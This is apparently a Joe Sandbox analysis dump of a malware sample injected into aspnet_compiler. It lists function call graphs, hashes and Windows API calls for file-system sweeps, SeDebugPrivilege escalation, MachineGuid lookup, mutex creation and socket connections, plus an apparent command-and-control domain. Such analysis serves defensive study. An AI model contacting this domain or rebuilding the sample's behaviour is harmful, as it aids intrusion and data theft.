9571 4090d2 9569->9571 9572 4090eb 9570->9572 9573 402bab 2 API calls 9571->9573 9574 408c4d 16 API calls 9572->9574 9577 409104 9572->9577 9573->9568 9575 4090fe 9574->9575 9576 402bab 2 API calls 9575->9576 9576->9577 9584 409cae 9599 404b79 9584->9599 9586 409cc5 9587 409d27 9586->9587 9588 405b6f 6 API calls 9586->9588 9590 409d2f 9586->9590 9589 402bab 2 API calls 9587->9589 9591 409cec 9588->9591 9589->9590 9591->9587 9592 404b79 6 API calls 9591->9592 9593 409d05 9592->9593 9594 409d1e 9593->9594 9595 408c4d 16 API calls 9593->9595 9596 402bab 2 API calls 9594->9596 9597 409d18 9595->9597 9596->9587 9598 402bab 2 API calls 9597->9598 9598->9594 9600 404b22 6 API calls 9599->9600 9601 404b8a 9600->9601 9601->9586 10321 411fb3 10322 405b6f 6 API calls 10321->10322 10324 412013 10322->10324 10323 412075 10324->10323 10339 41206a 10324->10339 10340 411a8d 10324->10340 10326 402bab 2 API calls 10326->10323 10328 4056bf 2 API calls 10329 41203d 10328->10329 10330 405872 4 API calls 10329->10330 10331 41204a 10330->10331 10332 413aca 4 API calls 10331->10332 10333 412054 10332->10333 10334 405695 2 API calls 10333->10334 10335 41205a 10334->10335 10336 413a58 14 API calls 10335->10336 10337 412064 10336->10337 10338 402bab 2 API calls 10337->10338 10338->10339 10339->10326 10341 402b7c 2 API calls 10340->10341 10342 411aa3 10341->10342 10350 411f05 10342->10350 10363 404ada 10342->10363 10345 404ada 4 API calls 10346 411cad 10345->10346 10347 411f0c 10346->10347 10348 411cc0 10346->10348 10349 402bab 2 API calls 10347->10349 10366 405eb6 10348->10366 10349->10350 10350->10328 10350->10339 10352 411d3c 10353 4031e5 4 API calls 10352->10353 10361 411d7b 10353->10361 10354 411ea6 10355 4031e5 4 API calls 10354->10355 10356 411eb5 10355->10356 10357 4031e5 4 API calls 10356->10357 10358 411ed6 10357->10358 10359 405eb6 4 API calls 10358->10359 10359->10350 10360 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10360->10361 10361->10354 10361->10360 10362 405eb6 4 API calls 10361->10362 10362->10361 10364 4031e5 4 API calls 10363->10364 10365 404afd 10364->10365 10365->10345 10367 405998 4 API calls 10366->10367 10368 405ec8 10367->10368 10368->10352 9631 40f6b8 9632 41219c 15 API calls 9631->9632 9633 40f6c7 9632->9633 9634 41219c 15 API calls 9633->9634 9635 40f6d5 9634->9635 9636 41219c 15 API calls 9635->9636 9637 40f6df 9636->9637 9656 40d6bd 9657 4056bf 2 API calls 9656->9657 9658 40d6c9 9657->9658 9669 404cbf 9658->9669 9661 404cbf 8 API calls 9662 40d6f4 9661->9662 9663 404cbf 8 API calls 9662->9663 9664 40d702 9663->9664 9665 413aca 4 API calls 9664->9665 9666 40d711 9665->9666 9667 405695 2 API calls 9666->9667 9668 40d71f 9667->9668 9670 402b7c 2 API calls 9669->9670 9671 404ccd 9670->9671 9672 404ddc 9671->9672 9673 404b8f 5 API calls 9671->9673 9672->9661 9674 404ce4 9673->9674 9675 404dd4 9674->9675 9677 402b7c 2 API calls 9674->9677 9676 402bab 2 API calls 9675->9676 9676->9672 9680 404d04 9677->9680 9678 404dcc 9679 404a39 5 API calls 9678->9679 9679->9675 9680->9678 9681 404dc6 9680->9681 9682 402b7c 2 API calls 9680->9682 9684 404b8f 5 API calls 9680->9684 9685 402bab GetProcessHeap RtlFreeHeap 9680->9685 9686 404a39 5 API calls 9680->9686 9687 405b6f 6 API calls 9680->9687 9688 404cbf 8 API calls 9680->9688 9683 402bab 2 API calls 9681->9683 9682->9680 9683->9678 9684->9680 9685->9680 9686->9680 9687->9680 9688->9680 9689 40f0bf 9690 4056bf 2 API calls 9689->9690 9691 40f0c9 9690->9691 9692 40f115 9691->9692 9694 404cbf 8 API calls 9691->9694 9693 41219c 15 API calls 9692->9693 9695 40f128 9693->9695 9696 40f0ed 9694->9696 9697 404cbf 8 API calls 9696->9697 9698 40f0fb 9697->9698 9699 413aca 4 API calls 9698->9699 9700 40f10a 9699->9700 9701 405695 2 API calls 9700->9701 9701->9692

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 159 403dd1-403dd8 151->159 160 403e9d-403ea4 call 402bab 151->160 154 403f97-403f9d 152->154 161 403ee8-403ef8 call 405d24 153->161 162 403f8e-403f94 call 402bab 153->162 166 403e75-403e90 call 4031e5 FindNextFileW 159->166 167 403dde-403de2 159->167 160->150 175 403f03-403f0a 161->175 176 403efa-403f01 161->176 162->152 166->159 179 403e96-403e97 call 403bef 166->179 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 188 403e30-403e4c call 405b6f 172->188 189 403e24-403e2e 172->189 173->166 185 403dfb-403e10 call 405eff 173->185 181 403f12-403f2d call 405b6f 175->181 182 403f0c-403f10 175->182 176->175 180 403f41-403f5c call 4031e5 FindNextFileW 176->180 193 403e9c 179->193 196 403f87-403f88 call 403bef 180->196 197 403f5e-403f61 180->197 181->180 199 403f2f-403f33 181->199 182->180 182->181 185->166 185->172 188->166 203 403e4e-403e6f call 403d74 call 402bab 188->203 189->166 189->188 193->160 207 403f8d 196->207 197->161 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 207->162 209->180 217->154
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                                                                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$FirstNext
                                                                                                                  • String ID: %s\%s$%s\*$Program Files$Windows
                                                                                                                  • API String ID: 1690352074-2009209621
                                                                                                                  • Opcode ID: b843d291922cb028a424347b2d452c12ea05f4332df516ff6c2fc32da94872c0
                                                                                                                  • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                                                                                  • Opcode Fuzzy Hash: b843d291922cb028a424347b2d452c12ea05f4332df516ff6c2fc32da94872c0
                                                                                                                  • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                                                                                  APIs
                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                                                                                                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                  • API String ID: 3615134276-2896544425
                                                                                                                  • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                                                  • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                                                                                                  • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                                                  • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1357844191-0
                                                                                                                  • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                                                  • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                                                                                  • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                                                  • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062e4 call 4031e5 265->273 266->257 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                                                                                  • _wmemset.LIBCMT ref: 00406244
                                                                                                                  • _wmemset.LIBCMT ref: 00406261
                                                                                                                  • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _wmemset$ErrorInformationLastToken
                                                                                                                  • String ID: IDA$IDA
                                                                                                                  • API String ID: 487585393-2020647798
                                                                                                                  • Opcode ID: 654613820412ff34d189ecba838125917ffe11d91a09519782bfa90cb0a14a81
                                                                                                                  • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                                                                                  • Opcode Fuzzy Hash: 654613820412ff34d189ecba838125917ffe11d91a09519782bfa90cb0a14a81
                                                                                                                  • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                                                                                                                  APIs
                                                                                                                  • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                                                                                  • socket.WS2_32(?,?,?), ref: 00404E7A
                                                                                                                  • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: freeaddrinfogetaddrinfosocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2479546573-0
                                                                                                                  • Opcode ID: e71fee0cb82f9de1c4e34fb615c0c1594af8034bef8567adcf2aba1f1a7220d0
                                                                                                                  • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                                                                                  • Opcode Fuzzy Hash: e71fee0cb82f9de1c4e34fb615c0c1594af8034bef8567adcf2aba1f1a7220d0
                                                                                                                  • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 569 4041a9-4041b8 call 403c59 562->569 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 569->576 577 4041db-4041e4 call 402bab 569->577 570->571 575 40411b-404120 570->575 574 40417d-40417e call 403c40 571->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->571 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AllocCreateReadVirtual
                                                                                                                  • String ID: .tmp
                                                                                                                  • API String ID: 3585551309-2986845003
                                                                                                                  • Opcode ID: 96dd47190825543ab0d2155488efc9e466da80610ec56339a9b7da9a3c2350c6
                                                                                                                  • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                                                                                  • Opcode Fuzzy Hash: 96dd47190825543ab0d2155488efc9e466da80610ec56339a9b7da9a3c2350c6
                                                                                                                  • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                                                                                  • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                                                                                  • GetLastError.KERNEL32 ref: 0041399E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$CreateLastModeMutex
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3448925889-0
                                                                                                                  • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                                                  • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                                                                                  • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                                                  • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                                                                                  • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CreatePointerWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3672724799-0
                                                                                                                  • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                                                  • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                                                                                  • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                                                  • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                                                                                  APIs
                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                                                                                    • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                                                                                    • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                                                                    • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$CreateFreeProcessThread_wmemset
                                                                                                                  • String ID: ckav.ru
                                                                                                                  • API String ID: 2915393847-2696028687
                                                                                                                  • Opcode ID: db0b94f36f1e73eb4733ffbe385f419cfabdcc537d06727fd8a0d6aade8f6cee
                                                                                                                  • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                                                                                  • Opcode Fuzzy Hash: db0b94f36f1e73eb4733ffbe385f419cfabdcc537d06727fd8a0d6aade8f6cee
                                                                                                                  • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                                  • _wmemset.LIBCMT ref: 0040634F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocateProcess_wmemset
                                                                                                                  • String ID: CA
                                                                                                                  • API String ID: 2773065342-1052703068
                                                                                                                  • Opcode ID: 211886b386c3dd172c07a9bc8158a6ecc58d54a6c84e520ba7ef39c50b042283
                                                                                                                  • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                                                                                  • Opcode Fuzzy Hash: 211886b386c3dd172c07a9bc8158a6ecc58d54a6c84e520ba7ef39c50b042283
                                                                                                                  • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                                                                                  APIs
                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InformationToken
                                                                                                                  • String ID: IDA
                                                                                                                  • API String ID: 4114910276-365204570
                                                                                                                  • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                                                  • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                                                                                                  • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                                                  • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc
                                                                                                                  • String ID: s1@
                                                                                                                  • API String ID: 190572456-427247929
                                                                                                                  • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                                                                  • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                                                                                                  • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                                                                  • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                                  • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                                                                                  • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocateOpenProcessQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1425999871-0
                                                                                                                  • Opcode ID: ff1e6c851b5f3ea5cf83d5590d52d177e00c05b60bca096cc9d56339f5657764
                                                                                                                  • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                                                                                  • Opcode Fuzzy Hash: ff1e6c851b5f3ea5cf83d5590d52d177e00c05b60bca096cc9d56339f5657764
                                                                                                                  • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                                                                  • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3859560861-0
                                                                                                                  • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                                                                                                  • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                                                                                                                  • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                                                                                                  • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                                                                                                                  APIs
                                                                                                                  • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CheckMembershipToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1351025785-0
                                                                                                                  • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                                                  • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                                                                                  • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                                                  • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                                                                                  APIs
                                                                                                                  • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                                                                                  Memory Dump Source
